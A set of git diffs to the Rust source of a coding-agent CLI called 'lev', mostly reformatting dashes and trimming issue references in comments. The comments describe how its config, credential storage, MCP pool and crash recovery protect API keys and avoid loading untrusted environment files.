     /// **Opt-in, and never selected for the user.** The CLI injects its own
-    /// context into every call — including the account email address on the
-    /// OAuth (subscription) path — which cannot be disabled. `lev setup` offers
+    /// context into every call - including the account email address on the
+    /// OAuth (subscription) path - which cannot be disabled. `lev setup` offers
     /// it and defaults to declining, so a user who presses Enter through the
     /// wizard ends up with it off.
     #[serde(default)]
@@ -486,8 +486,8 @@ pub struct ProviderConfig {
 /// Hand-written so the API keys can never be printed.
 ///
 /// A `#[derive(Debug)]` here meant one `tracing::debug!(?config)` anywhere in
-/// the workspace — or one `dbg!`, or an `anyhow` context that formats a struct
-/// holding this — would put every provider key into the logs. Nothing did that
+/// the workspace - or one `dbg!`, or an `anyhow` context that formats a struct
+/// holding this - would put every provider key into the logs. Nothing did that
 /// today, which is exactly when it is cheap to foreclose: the type now cannot
 /// leak, so nobody has to remember not to.
 ///
@@ -605,7 +605,7 @@ impl Config {
         // `Config::load()` reads process-wide state, and `cargo test` runs tests
         // in parallel threads of one process. `temp_env` serializes its own
         // calls behind a global lock, but a test that reaches this function
-        // without going through that lock races every test that holds it — so
+        // without going through that lock races every test that holds it - so
         // it sees whatever variables happen to be set or unset at that instant.
         // That is not hypothetical: the `serve` CORS test failed on CI in two
         // different places depending on when it lost the race, each time
@@ -630,8 +630,8 @@ impl Config {
         //
         // `dotenvy::dotenv()` searches the cwd *and every ancestor*, which is
         // the wrong shape for a coding agent: `lev` is designed to be run inside
-        // cloned repositories, so an untrusted repo's `.env` — or one in any
-        // directory above it — was loaded into the process environment. That is
+        // cloned repositories, so an untrusted repo's `.env` - or one in any
+        // directory above it - was loaded into the process environment. That is
         // load-bearing well beyond provider keys: `PATH` and `SHELL` decide what
         // gets executed, `EDITOR`/`VISUAL` are split and spawned, `OLLAMA_HOST`
         // redirects inference to an attacker's endpoint, `LEVIATH_HOME`
@@ -639,7 +639,7 @@ impl Config {
         // `LEVIATH_API_TOKEN` sets a known credential on the agent-spawning API.
         //
         // `from_filename` reads only `./.env`. Still the user's own working
-        // directory, so this is not a trust boundary on its own — but it is one
+        // directory, so this is not a trust boundary on its own - but it is one
         // directory the user chose rather than an unbounded walk up the tree.
         //
         // `LEVIATH_SKIP_DOTENV` lets tests isolate `Config::load()` completely.
@@ -717,13 +717,13 @@ impl Config {
     /// Runs *after* the file and the environment, so precedence is file > env >
     /// keychain: what the user can see wins over what they cannot. In keychain
     /// mode `lev auth migrate` strips the keys out of the file, so in practice
-    /// the keychain is the only source — but a key left behind by hand keeps
+    /// the keychain is the only source - but a key left behind by hand keeps
     /// working rather than being silently ignored, and `lev auth status` reports
     /// when a secret exists in both places.
     ///
     /// A store that cannot be opened is a warning, not a hard failure. The user
     /// may still have working keys in their environment, and refusing to load
-    /// the config at all would take down `lev auth status` — the one command
+    /// the config at all would take down `lev auth status` - the one command
     /// that can explain what is wrong. The resolution is the caller's so that
     /// path is testable: "no store is installed in this process" is not the same
     /// as "this machine has no keychain", and on a developer's Mac the first
@@ -763,7 +763,7 @@ impl Config {
     ///
     /// What gets serialized in keychain mode: the secrets go to the OS store and
     /// the file keeps only the settings. Returning a stripped copy rather than
-    /// mutating in place matters — the caller is usually saving a config it is
+    /// mutating in place matters - the caller is usually saving a config it is
     /// still going to use for inference, and blanking its keys would break the
     /// run that triggered the save.
     fn without_secrets(&self) -> Self {
@@ -801,7 +801,7 @@ impl Config {
         }
 
         // In keychain mode the secrets belong in the OS store, and the file
-        // keeps only the settings -- otherwise `lev setup` would helpfully write
+        // keeps only the settings - otherwise `lev setup` would helpfully write
         // every key back into `config.toml` and quietly undo the migration.
         //
         // A store that cannot be written is *not* silently downgraded to writing
@@ -812,7 +812,7 @@ impl Config {
     }
 
     /// Core of [`save_to_path`](Self::save_to_path) with the backend already
-    /// resolved -- see
+    /// resolved - see
     /// [`fill_from_credential_store_with`](Self::fill_from_credential_store_with)
     /// for why the resolution is the caller's.
     fn write_to(
@@ -838,7 +838,7 @@ impl Config {
 
         // `write_private`, not `fs::write` + `chmod`. This file holds every
         // provider API key, and the two-step version left it at the umask
-        // default (typically 0644) between the write and the mode change — so
+        // default (typically 0644) between the write and the mode change - so
         // every save had a moment where any local user could read the keys.
         leviath_sys::write_private(path, content.as_bytes()).map_err(|e| {
             anyhow::anyhow!("Failed to write config to '{}': {}", path.display(), e)
@@ -867,8 +867,8 @@ impl Config {
     /// along with every other home-relative path.
     ///
     /// It used to honor only the first. `LEVIATH_HOME`'s whole purpose is to
-    /// "redirect every home-relative path at once" — that is what its doc says
-    /// and what tests, sandboxed runs and scratch environments rely on — so a
+    /// "redirect every home-relative path at once" - that is what its doc says
+    /// and what tests, sandboxed runs and scratch environments rely on - so a
     /// config path that quietly ignored it meant a run that believed it was
     /// isolated would read *and write* the developer's real
     /// `~/.leviath/config.toml`, the file holding every provider API key. Found
@@ -892,14 +892,14 @@ impl Config {
             && !key.starts_with("sk-ant-")
         {
             warnings.push(
-                "Anthropic API key doesn't start with 'sk-ant-' — verify it's correct".to_string(),
+                "Anthropic API key doesn't start with 'sk-ant-' - verify it's correct".to_string(),
             );
         }
         if let Some(ref key) = self.providers.openai_api_key
             && !key.starts_with("sk-")
         {
             warnings
-                .push("OpenAI API key doesn't start with 'sk-' — verify it's correct".to_string());
+                .push("OpenAI API key doesn't start with 'sk-' - verify it's correct".to_string());
         }
         warnings
     }
@@ -924,7 +924,7 @@ fn create_config_dir(dir: &std::path::Path) -> anyhow::Result<()> {
 
 /// Check permissions on the config file and auto-fix if too permissive.
 ///
-/// A no-op on non-Unix platforms — see [`leviath_sys::ensure_file_private`].
+/// A no-op on non-Unix platforms - see [`leviath_sys::ensure_file_private`].
 fn check_permissions() {
     check_permissions_at(&Config::config_path());
 }
@@ -940,7 +940,7 @@ fn check_permissions_at(path: &std::path::Path) {
 
 /// Core of [`check_permissions_at`] with the permission-hardening operation
 /// injected, so the "fix failed" arm can be covered deterministically on every
-/// OS. On disk that `Err` only occurs when a file exists but `chmod` fails —
+/// OS. On disk that `Err` only occurs when a file exists but `chmod` fails -
 /// forcing that without root differs per platform (macOS `chflags uchg`, no
 /// portable Linux equivalent), so a `fn` pointer is injected instead of relying
 /// on an OS-specific trick. A `fn` pointer (not `impl Fn`) keeps this to a
@@ -995,15 +995,15 @@ pub(crate) static CWD_LOCK: std::sync::Mutex<()> = std::sync::Mutex::new(());
 /// Wraps the `MutexGuard` inside a private field specifically so it can be held
 /// across an `.await` in an async test without tripping clippy's
 /// `await_holding_lock` lint, which only looks for a directly-visible
-/// `MutexGuard` local -- not one hidden inside a wrapper struct's field.
+/// `MutexGuard` local - not one hidden inside a wrapper struct's field.
 /// That's not working around a real risk: each `#[tokio::test]` gets its
 /// own private single-threaded runtime, so holding this across an await
 /// can't starve another task in the *same* test: it only serializes
 /// against other CWD-mutating tests, which is exactly the intended effect.
 ///
-/// Was `#[cfg(unix)]` as well, because its only caller —
-/// `commands/list.rs`'s `execute_falls_back_to_default_cwd_when_current_dir_is_gone`
-/// — is Unix-only (the race it reproduces, deleting a directory that is the
+/// Was `#[cfg(unix)]` as well, because its only caller -
+/// `commands/list.rs`'s `execute_falls_back_to_default_cwd_when_current_dir_is_gone` -
+/// is Unix-only (the race it reproduces, deleting a directory that is the
 /// process's live CWD, is a sharing violation on Windows rather than a
 /// reproducible state), which made it dead code there under `-D warnings`.
 /// `a_dot_env_in_the_working_directory_is_read` is a second caller that must run
@@ -1117,7 +1117,7 @@ mod dotenv_tests {
     use super::*;
 
     /// `Config::load()` reads `./.env`, and every isolated test sets
-    /// `LEVIATH_SKIP_DOTENV` — so that branch would otherwise never run.
+    /// `LEVIATH_SKIP_DOTENV` - so that branch would otherwise never run.
     ///
     /// It used to be covered by the tests that read the real environment, which
     /// is to say by the tests that were racing. Covered deliberately here
@@ -1131,7 +1131,7 @@ mod dotenv_tests {
         let dir = make_fake_config_dir("dotenv-read");
         std::fs::write(dir.join(".env"), "LEV_DOTENV_PROBE=seen\n").unwrap();
 
-        // Scoped so the CWD guard drops — restoring the working directory —
+        // Scoped so the CWD guard drops - restoring the working directory -
         // before the cleanup below. Windows refuses to remove a directory that
         // is some process's live CWD.
         {
@@ -1335,7 +1335,7 @@ mod tests {
     }
 
     /// The three resolutions the loader can get back. A keychain that was asked
-    /// for but is unreachable must warn and carry on -- refusing to load the
+    /// for but is unreachable must warn and carry on - refusing to load the
     /// config would take down `lev auth status`, the one command that can
     /// explain the problem.
     #[test]
@@ -1609,7 +1609,7 @@ google_api_key = "AIza-existing"
     #[test]
     fn save_to_path_with_no_parent_skips_create_config_dir() {
         // `Path::parent()` returns `None` only for an empty path or a
-        // filesystem root -- `PathBuf::from("")` triggers the empty case
+        // filesystem root - `PathBuf::from("")` triggers the empty case
         // cross-platform, hitting the `if let Some(parent) = ...` block's
         // `None` arm (skip `create_config_dir`) without a platform-specific
         // root path. The subsequent `fs::write("")` then fails, which is
@@ -1721,12 +1721,12 @@ google_api_key = "AIza-existing"
         assert_eq!(mode & 0o777, 0o600);
     }
 
-    // On macOS/BSD, `chflags uchg` sets the user-immutable flag -- settable
-    // by a regular file owner without root -- which blocks `chmod` (and thus
+    // On macOS/BSD, `chflags uchg` sets the user-immutable flag - settable
+    // by a regular file owner without root - which blocks `chmod` (and thus
     // `std::fs::set_permissions`) with EPERM while leaving `exists()`/
     // The "fix failed" arm of `check_permissions_at` (a file that exists but
     // whose `chmod` fails) is exercised deterministically on every OS by
-    // injecting a failing `ensure` fn — no `chflags uchg`/root trick, which was
+    // injecting a failing `ensure` fn - no `chflags uchg`/root trick, which was
     // macOS-only and left this branch uncovered on Linux CI.
     #[test]
     fn check_permissions_at_with_logs_when_fix_fails() {
@@ -1751,8 +1751,8 @@ google_api_key = "AIza-existing"
 
     // Portable failure injection for the hardening error arms of
     // `set_file_permissions`/`set_dir_permissions`. `leviath_sys`'s Windows
-    // fallback is infallible (always `Ok`) -- and even a missing path fails only
-    // on Unix -- so the only cross-platform way to reach the `Err` arm is to
+    // fallback is infallible (always `Ok`) - and even a missing path fails only
+    // on Unix - so the only cross-platform way to reach the `Err` arm is to
     // inject a hardening op that fails (mirroring `check_permissions_at_with`).
     fn always_failing_secure(_path: &std::path::Path) -> std::io::Result<()> {
         Err(std::io::Error::other(
@@ -1771,7 +1771,7 @@ google_api_key = "AIza-existing"
     }
 
     // ─── create_config_dir / set_file_permissions / set_dir_permissions ───
-    // (already path-parameterized — directly testable without touching the
+    // (already path-parameterized - directly testable without touching the
     // real ~/.leviath/config.toml)
 
     #[test]
@@ -1794,7 +1794,7 @@ google_api_key = "AIza-existing"
     }
 
     /// The config holds every provider API key, so it must never be readable by
-    /// anyone else — not even for the instant between a `write` and a `chmod`,
+    /// anyone else - not even for the instant between a `write` and a `chmod`,
     /// which is how it used to be saved. `write_private` creates the file with
     /// the mode already applied.
     #[cfg(unix)]
@@ -1803,7 +1803,7 @@ google_api_key = "AIza-existing"
     ///
     /// It did not, and the consequence was concrete: a scratch environment that
     /// set `LEVIATH_HOME` and ran `lev mcp add` wrote to the developer's *real*
-    /// `~/.leviath/config.toml` — the file holding every provider API key —
+    /// `~/.leviath/config.toml` - the file holding every provider API key -
     /// while believing it was isolated.
     #[test]
     fn config_path_honors_leviath_home() {
@@ -2161,7 +2161,7 @@ args = ["hello"]
     #[test]
     fn load_rejects_a_malformed_mcp_server_entry() {
         // An entry with neither `command` nor `url` can never connect, so it
-        // must fail at load — naming the server — rather than silently drop its
+        // must fail at load - naming the server - rather than silently drop its
         // tools until the first call.
         let dir = tempfile::tempdir().unwrap();
         let path = dir.path().join("config.toml");
@@ -2407,7 +2407,7 @@ enabled = false
     fn title_config_missing_enabled_key_uses_default_true() {
         // Unlike `title_config_from_toml_defaults` (which omits the whole
         // `[title]` table, falling back to `Config`'s own `#[serde(default)]`
-        // for the field -- never invoking `TitleConfig`'s own per-field
+        // for the field - never invoking `TitleConfig`'s own per-field
         // parsing at all), this includes `[title]` but omits `enabled`
         // specifically, forcing serde to deserialize `TitleConfig` field by
         // field and fall back to `default_true()` for the missing key.

--- a/crates/leviath-cli/src/credentials.rs
+++ b/crates/leviath-cli/src/credentials.rs
@@ -11,7 +11,7 @@ use leviath_core::{CredentialStore, CredentialStoreKind};
 /// The provider API keys Leviath knows how to move into a credential store.
 ///
 /// Fixed, because the OS stores offer no portable "list everything under this
-/// service" operation — the accounts to look for have to come from somewhere,
+/// service" operation - the accounts to look for have to come from somewhere,
 /// and for providers that is this list.
 pub const PROVIDER_KEYS: &[&str] = &["anthropic", "openai", "google", "openrouter"];
 
@@ -69,7 +69,7 @@ pub type Resolved = Result<Option<Box<dyn CredentialStore>>, String>;
 /// seam idiom used for the browser opener and the socket peer lookup. The seam
 /// is not a convenience: "no store is installed in this process" and "this
 /// machine has no credential store" are different things, and on a developer's
-/// Mac the first silently becomes the second — the real probe would install the
+/// Mac the first silently becomes the second - the real probe would install the
 /// platform store and every following operation would hit the real login
 /// keychain, prompting and writing. Injecting the probe is what makes an
 /// unavailable keychain testable without that.
@@ -99,7 +99,7 @@ pub(crate) fn no_store_available(_service: &str) -> Result<(), String> {
 ///
 /// `keyring_core`'s default store is one global. Two modules each holding their
 /// *own* mutex would serialize against themselves and race each other, so this
-/// lives here — beside the backend it protects — rather than in each test module.
+/// lives here - beside the backend it protects - rather than in each test module.
 #[cfg(test)]
 pub(crate) mod test_store {
     static STORE: std::sync::Mutex<()> = std::sync::Mutex::new(());
@@ -136,7 +136,7 @@ mod tests {
     }
 
     /// The adapter over the real `leviath_sys::keychain` path, driven against an
-    /// in-memory store installed as the process default — see the module docs in
+    /// in-memory store installed as the process default - see the module docs in
     /// `leviath-sys` for why reaching a real keychain is not an option in tests.
     #[test]
     fn the_keychain_adapter_round_trips_a_secret() {
@@ -151,7 +151,7 @@ mod tests {
         assert!(!store.delete(&account).unwrap());
     }
 
-    /// `file` is the default and must not consult the OS at all — the probe is
+    /// `file` is the default and must not consult the OS at all - the probe is
     /// never even called, so a machine with no keychain is unaffected.
     #[test]
     fn the_file_backend_never_probes() {
@@ -178,12 +178,12 @@ mod tests {
     }
 
     /// Asking for the keychain on a machine that has none must say which
-    /// setting caused it — otherwise the error looks like a Leviath bug rather
+    /// setting caused it - otherwise the error looks like a Leviath bug rather
     /// than a configuration choice.
     #[test]
     fn asking_for_an_unavailable_keychain_names_the_setting() {
         // `.err()` rather than `expect_err`, which would need `Debug` on the
-        // boxed trait object -- and leaves no unreachable `Ok` arm behind.
+        // boxed trait object - and leaves no unreachable `Ok` arm behind.
         let err = store_for_with(CredentialStoreKind::Keychain, no_store_available)
             .err()
             .expect("a failing probe must not yield a store");

--- a/crates/leviath-cli/src/daemon/client.rs
+++ b/crates/leviath-cli/src/daemon/client.rs
@@ -20,7 +20,7 @@ use crate::runstate::new_run_id;
 /// blueprint's declared caller-input regions.
 ///
 /// `regions` maps a flag name to its raw value. An unknown region name (one the
-/// blueprint doesn't read as caller input) is a hard error here — fast, local
+/// blueprint doesn't read as caller input) is a hard error here - fast, local
 /// typo protection before the daemon is contacted.
 #[allow(clippy::too_many_arguments)]
 pub fn resolve_spawn_args(

--- a/crates/leviath-cli/src/daemon/fanout_spawner.rs
+++ b/crates/leviath-cli/src/daemon/fanout_spawner.rs
@@ -37,7 +37,7 @@ pub struct DaemonFanOutSpawner {
     pub mcp_tool_defs: Vec<Tool>,
     /// Shared MCP pool for per-agent `[[mcp_servers]]` - a fan-out worker
     /// advertises its blueprint's already-connected servers and lazily warms any
-    /// uncached ones for subsequent workers of the same type (issue #97).
+    /// uncached ones for subsequent workers of the same type.
     pub mcp_pool: Arc<crate::daemon::mcp_pool::McpPool>,
     pub hub: InteractionHub,
     pub subagent_tx: UnboundedSender<SubAgentOp>,

--- a/crates/leviath-cli/src/daemon/fanout_spawner.rs
+++ b/crates/leviath-cli/src/daemon/fanout_spawner.rs
@@ -3,7 +3,7 @@
 //! the shared world, seeded with its work item.
 //!
 //! The runtime's fan-out systems only *start and track* workers; *finding* the
-//! blueprint is CLI policy, so it lives here — mirroring how [`build_agent`]
+//! blueprint is CLI policy, so it lives here - mirroring how [`build_agent`]
 //! resolves any spawn. For `worker_stage` the worker runs the parent's own
 //! blueprint entered at that stage (via [`leviath_runtime::pipeline::force_transition`]);
 //! for `worker_agent` / `worker_query` it runs a separate installed blueprint.
@@ -35,7 +35,7 @@ pub struct DaemonFanOutSpawner {
     pub config: Config,
     pub shared_mcp: Arc<Mutex<leviath_mcp::ToolExecutor>>,
     pub mcp_tool_defs: Vec<Tool>,
-    /// Shared MCP pool for per-agent `[[mcp_servers]]` — a fan-out worker
+    /// Shared MCP pool for per-agent `[[mcp_servers]]` - a fan-out worker
     /// advertises its blueprint's already-connected servers and lazily warms any
     /// uncached ones for subsequent workers of the same type (issue #97).
     pub mcp_pool: Arc<crate::daemon::mcp_pool::McpPool>,
@@ -51,7 +51,7 @@ pub struct DaemonFanOutSpawner {
 impl DaemonFanOutSpawner {
     /// A fan-out worker's advertised MCP defs: the global servers' defs plus its
     /// blueprint's already-cached servers. Any uncached server is warmed on a
-    /// detached task (via the current runtime handle — `spawn_worker` runs inside
+    /// detached task (via the current runtime handle - `spawn_worker` runs inside
     /// the daemon's tick, on the runtime) so a subsequent worker of the same type
     /// advertises it. Returns just the global defs when the manifest is unreadable
     /// or declares no servers.
@@ -114,7 +114,7 @@ impl FanOutSpawner for DaemonFanOutSpawner {
 
         // Per-agent MCP (issue #97): advertise the worker blueprint's servers that
         // are already connected in the shared pool (a `worker_stage` worker shares
-        // the parent's — already warmed by the parent's preprocessor; the first
+        // the parent's - already warmed by the parent's preprocessor; the first
         // `worker_agent`/`worker_query` worker warms them here for its siblings).
         let mcp_defs = self.worker_mcp_defs(&args.blueprint_path);
 
@@ -374,7 +374,7 @@ mod tests {
         )
         .unwrap();
         // Seed the pool so the server's tool is already advertised (and the
-        // detached warm task hits the cache — no real connection).
+        // detached warm task hits the cache - no real connection).
         let servers = crate::daemon::mcp_pool::parse_blueprint_mcp_servers(
             &std::fs::read_to_string(&manifest).unwrap(),
         );
@@ -536,7 +536,7 @@ mod tests {
         let (mut world, spawner, parent) = world_with_parent(&manifest.to_string_lossy());
 
         // A worker blueprint that parses but fails validation (transition to a
-        // stage that doesn't exist) — resolve succeeds, build_agent errors.
+        // stage that doesn't exist) - resolve succeeds, build_agent errors.
         let bad_dir = dir.path().join("bad");
         std::fs::create_dir_all(&bad_dir).unwrap();
         std::fs::write(

--- a/crates/leviath-cli/src/daemon/mcp_pool.rs
+++ b/crates/leviath-cli/src/daemon/mcp_pool.rs
@@ -31,7 +31,7 @@ pub struct McpPool {
     connected: StdMutex<HashMap<String, Vec<Tool>>>,
     /// Where MCP OAuth grants are kept, so a refreshed token is written back to
     /// the backend it came from. Defaults to the file store, which is also the
-    /// config default -- a pool built without being told reads `mcp-auth.json`,
+    /// config default - a pool built without being told reads `mcp-auth.json`,
     /// exactly as before this field existed.
     credential_store: leviath_core::CredentialStoreKind,
     /// `[security] allow_env_vars`: which credential-shaped variables an MCP
@@ -92,7 +92,7 @@ impl McpPool {
     /// through `credential_store`'s backend.
     ///
     /// The pool refreshes lapsed tokens and writes them back, so it has to write
-    /// them where the user asked for them to be kept -- otherwise the first
+    /// them where the user asked for them to be kept - otherwise the first
     /// refresh after a keychain migration would put a fresh refresh token back
     /// on disk.
     pub fn for_daemon_with(
@@ -161,7 +161,7 @@ impl McpPool {
             Ok(header) => header,
             Err(e) => {
                 let err = e.to_string();
-                tracing::warn!(server = %config.name, error = %err, "MCP auth unavailable — skipping");
+                tracing::warn!(server = %config.name, error = %err, "MCP auth unavailable - skipping");
                 return Vec::new();
             }
         };
@@ -223,7 +223,7 @@ impl McpPool {
     /// `runs_dir`, so a run reloaded on daemon restart can still *execute* its
     /// blueprint MCP tools (their advertisement is restored from the snapshot;
     /// only the shared connection is lost across a restart). Blueprint paths are
-    /// collected synchronously, then connected — no fs iterator is held across an
+    /// collected synchronously, then connected - no fs iterator is held across an
     /// `.await`.
     pub async fn warm_recovered(&self, runs_dir: &std::path::Path) {
         use leviath_core::run_meta::RunStatus;
@@ -256,7 +256,7 @@ impl McpPool {
     }
 
     /// The cached defs for every config in `configs` (pool must already be warm
-    /// for them — call [`Self::ensure`] first). Unknown/unconnected configs
+    /// for them - call [`Self::ensure`] first). Unknown/unconnected configs
     /// contribute nothing. This is the sync read the spawner uses.
     pub fn cached_defs_for(&self, configs: &[MCPServerConfig]) -> Vec<Tool> {
         let cache = self
@@ -274,11 +274,11 @@ impl McpPool {
 
 /// Parse a blueprint manifest's `[[mcp_servers]]` array (issue #97). Parsed
 /// CLI-side because `leviath-core` cannot depend on `leviath-mcp` (that crate
-/// already depends on core — a cycle). Returns an empty vec when the section is
+/// already depends on core - a cycle). Returns an empty vec when the section is
 /// absent or malformed; a malformed entry is skipped with a warning.
 pub fn parse_blueprint_mcp_servers(manifest_toml: &str) -> Vec<MCPServerConfig> {
     // `toml::from_str`, not `manifest_toml.parse::<toml::Value>()`. In toml 1.x
-    // `FromStr for Value` parses a single *value*, not a document — so a real
+    // `FromStr for Value` parses a single *value*, not a document - so a real
     // manifest starting with `[agent]` reads as an array literal followed by
     // junk and fails. It still compiles, so the change is silent; the tests are
     // what caught it.
@@ -304,7 +304,7 @@ mod tests {
     use crate::test_support::with_tracing;
 
     /// A minimal stdio MCP server (python3) speaking initialize / tools/list /
-    /// tools/call — mirrors the fixtures in `tools.rs`.
+    /// tools/call - mirrors the fixtures in `tools.rs`.
     const STUB: &str = r#"
 import sys, json
 def respond(i, r):

--- a/crates/leviath-cli/src/daemon/mcp_pool.rs
+++ b/crates/leviath-cli/src/daemon/mcp_pool.rs
@@ -1,4 +1,4 @@
-//! The shared, lazily-connected MCP pool (issue #97).
+//! The shared, lazily-connected MCP pool.
 //!
 //! Per-agent `[[mcp_servers]]` let a blueprint carry its own MCP tool
 //! dependencies. Rather than spawn a connection per agent, all agents share one
@@ -31,8 +31,7 @@ pub struct McpPool {
     connected: StdMutex<HashMap<String, Vec<Tool>>>,
     /// Where MCP OAuth grants are kept, so a refreshed token is written back to
     /// the backend it came from. Defaults to the file store, which is also the
-    /// config default - a pool built without being told reads `mcp-auth.json`,
-    /// exactly as before this field existed.
+    /// config default - a pool built without being told reads `mcp-auth.json`.
     credential_store: leviath_core::CredentialStoreKind,
     /// `[security] allow_env_vars`: which credential-shaped variables an MCP
     /// server's `${VAR}` headers may interpolate.
@@ -272,7 +271,7 @@ impl McpPool {
     }
 }
 
-/// Parse a blueprint manifest's `[[mcp_servers]]` array (issue #97). Parsed
+/// Parse a blueprint manifest's `[[mcp_servers]]` array. Parsed
 /// CLI-side because `leviath-core` cannot depend on `leviath-mcp` (that crate
 /// already depends on core - a cycle). Returns an empty vec when the section is
 /// absent or malformed; a malformed entry is skipped with a warning.

--- a/crates/leviath-cli/src/daemon/recovery.rs
+++ b/crates/leviath-cli/src/daemon/recovery.rs
@@ -16,7 +16,7 @@
 //! `interactions.json` sidecar while blocked. For those, `reload_one` calls
 //! [`leviath_runtime::interaction_points::restore_interaction_point`] to bring the
 //! agent back in the *waiting* state with the same prompt re-opened, rather than
-//! re-inferring and dropping it (issue #38). Model-initiated dynamic tools
+//! re-inferring and dropping it. Model-initiated dynamic tools
 //! (`ask_user_*`, `present_for_review`, `edit_document`) and taint-gate prompts are
 //! not persisted - they block inside the transient tool-worker turn, so on restart
 //! they take the ordinary re-inference path and the model simply re-asks.
@@ -249,9 +249,9 @@ fn totals_from(meta: &RunMeta) -> TokenTotals {
 /// The daemon is the sole owner of these runs, so anything still marked
 /// `running` at startup is by definition not running. Runs that *can* be
 /// reloaded are resumed (that is the whole point of this module); this is only
-/// for the ones that can't - which used to be logged and then left claiming
-/// `"status": "running"` on disk forever, so `lev ps` and the dashboard showed
-/// a live run that no longer existed (issue #109).
+/// for the ones that can't. Logging the failure without this write would leave
+/// them claiming `"status": "running"` on disk forever, so `lev ps` and the
+/// dashboard would show a live run that no longer exists.
 ///
 /// Best-effort: a write failure here is logged, never fatal - the daemon is
 /// mid-startup and the rest of the recovery pass must still run.
@@ -720,7 +720,7 @@ mod tests {
         assert_eq!(totals.prompt_tokens, 99);
     }
 
-    /// The issue #43 fix: when the atomic journal (`run.lvr`) and the separate
+    /// Torn-snapshot pairing: when the atomic journal (`run.lvr`) and the separate
     /// `context.json` disagree - the crash-window state where a new `meta.json`
     /// sits next to a stale `context.json` - resume restores the journal's
     /// consistent `{meta, context}` pair, not the stale JSON.

--- a/crates/leviath-cli/src/daemon/recovery.rs
+++ b/crates/leviath-cli/src/daemon/recovery.rs
@@ -1,6 +1,6 @@
 //! Restart recovery: reload persisted non-terminal agents into a fresh world when
 //! the daemon starts, so runs interrupted by a stop/crash resume where they left
-//! off — critically, any agent that was mid-inference re-issues that inference
+//! off - critically, any agent that was mid-inference re-issues that inference
 //! (the reloaded agent is `ReadyToInfer`), rather than being lost.
 //!
 //! For each `<runs_dir>/<run_id>/meta.json` whose status is non-terminal, this
@@ -18,7 +18,7 @@
 //! agent back in the *waiting* state with the same prompt re-opened, rather than
 //! re-inferring and dropping it (issue #38). Model-initiated dynamic tools
 //! (`ask_user_*`, `present_for_review`, `edit_document`) and taint-gate prompts are
-//! not persisted — they block inside the transient tool-worker turn, so on restart
+//! not persisted - they block inside the transient tool-worker turn, so on restart
 //! they take the ordinary re-inference path and the model simply re-asks.
 
 use std::path::Path;
@@ -59,7 +59,7 @@ pub fn reload_persisted_agents(
 ) -> Vec<(String, Entity)> {
     let mut reloaded: Vec<(RunMeta, Entity)> = Vec::new();
     let Ok(dir_entries) = std::fs::read_dir(runs_dir) else {
-        return Vec::new(); // no runs dir yet — nothing to recover
+        return Vec::new(); // no runs dir yet - nothing to recover
     };
     // Scan phase: collect every persisted run's metadata + whether it's parked mid
     // fan-out (has a fanout.json), so the triage can rank them.
@@ -249,11 +249,11 @@ fn totals_from(meta: &RunMeta) -> TokenTotals {
 /// The daemon is the sole owner of these runs, so anything still marked
 /// `running` at startup is by definition not running. Runs that *can* be
 /// reloaded are resumed (that is the whole point of this module); this is only
-/// for the ones that can't — which used to be logged and then left claiming
+/// for the ones that can't - which used to be logged and then left claiming
 /// `"status": "running"` on disk forever, so `lev ps` and the dashboard showed
 /// a live run that no longer existed (issue #109).
 ///
-/// Best-effort: a write failure here is logged, never fatal — the daemon is
+/// Best-effort: a write failure here is logged, never fatal - the daemon is
 /// mid-startup and the rest of the recovery pass must still run.
 fn mark_crashed(run_dir: &Path, meta: RunMeta, reason: &str, now_secs: i64) {
     let crashed = RunMeta {
@@ -339,7 +339,7 @@ fn reload_one(
     // context). The archive is appended *before* either JSON file, so in that exact
     // crash window it already holds the newer generation and folds to a consistent
     // `{meta, context}`. Fall back to the separate JSON files only for runs written
-    // before the archive existed, or an archive that couldn't be read at all — that
+    // before the archive existed, or an archive that couldn't be read at all - that
     // pair may be one tick out of sync, but it's the pre-existing behavior.
     let folded = std::fs::read(run_dir.join("run.lvr"))
         .ok()
@@ -407,7 +407,7 @@ fn reload_one(
 
     // If this run was parked at a stage-boundary interaction point (e.g.
     // plan_approval), re-present it in the *waiting* state rather than the default
-    // `Active` + `ReadyToInfer` restore — so the open prompt survives the restart
+    // `Active` + `ReadyToInfer` restore - so the open prompt survives the restart
     // instead of being dropped and re-inferred (issue #38). A missing/malformed
     // sidecar, or a blueprint that no longer matches, leaves the default restore.
     if let Some(state) = std::fs::read_to_string(run_dir.join("interactions.json"))
@@ -477,7 +477,7 @@ mod tests {
     }
 
     fn coder_manifest() -> String {
-        // Self-contained fixture — not the shipped blueprint (see test_support).
+        // Self-contained fixture - not the shipped blueprint (see test_support).
         crate::test_support::inline_coder_manifest()
     }
 
@@ -573,7 +573,7 @@ mod tests {
     }
 
     /// Write a `<runs_dir>/<run_id>/run.lvr` that folds to the given `stage_index`,
-    /// `iteration`, `prompt_tokens`, and `context` — the run's atomic journal. Used
+    /// `iteration`, `prompt_tokens`, and `context` - the run's atomic journal. Used
     /// to prove recovery prefers this consistent pair over a stale `context.json`.
     fn write_run_archive(
         runs_dir: &Path,
@@ -660,7 +660,7 @@ mod tests {
             RunStatus::Running,
             Some(&ctx),
         );
-        // A completed run — must be skipped.
+        // A completed run - must be skipped.
         write_run(
             runs.path(),
             "run-done",
@@ -721,8 +721,8 @@ mod tests {
     }
 
     /// The issue #43 fix: when the atomic journal (`run.lvr`) and the separate
-    /// `context.json` disagree — the crash-window state where a new `meta.json`
-    /// sits next to a stale `context.json` — resume restores the journal's
+    /// `context.json` disagree - the crash-window state where a new `meta.json`
+    /// sits next to a stale `context.json` - resume restores the journal's
     /// consistent `{meta, context}` pair, not the stale JSON.
     #[tokio::test]
     async fn reload_prefers_the_atomic_journal_over_a_stale_context_json() {
@@ -732,7 +732,7 @@ mod tests {
         let runs = tempfile::tempdir().unwrap();
 
         // A STALE context.json (older generation) alongside a meta.json whose
-        // iteration/totals are also older than the journal — write_run stamps
+        // iteration/totals are also older than the journal - write_run stamps
         // iteration 5 / prompt_tokens 42.
         let stale = ContextSnapshot {
             stage_name: "stale-stage".to_string(),
@@ -894,7 +894,7 @@ mod tests {
         let (run_id, entity) = &restored[0];
         assert_eq!(run_id, "run-await");
         // Re-armed in the *waiting* state (not the default Active), so no inference
-        // re-issues and the open prompt isn't dropped — the issue #38 fix.
+        // re-issues and the open prompt isn't dropped - the issue #38 fix.
         assert_eq!(world.agent_status(*entity), Some(AgentStatus::Waiting));
         assert!(
             world
@@ -1350,7 +1350,7 @@ mod tests {
         assert!(restored.is_empty()); // all skipped, none fatal
 
         // The un-reloadable run is recorded as crashed rather than left claiming
-        // it is still running (issue #109) — `lev ps` and the dashboard would
+        // it is still running (issue #109) - `lev ps` and the dashboard would
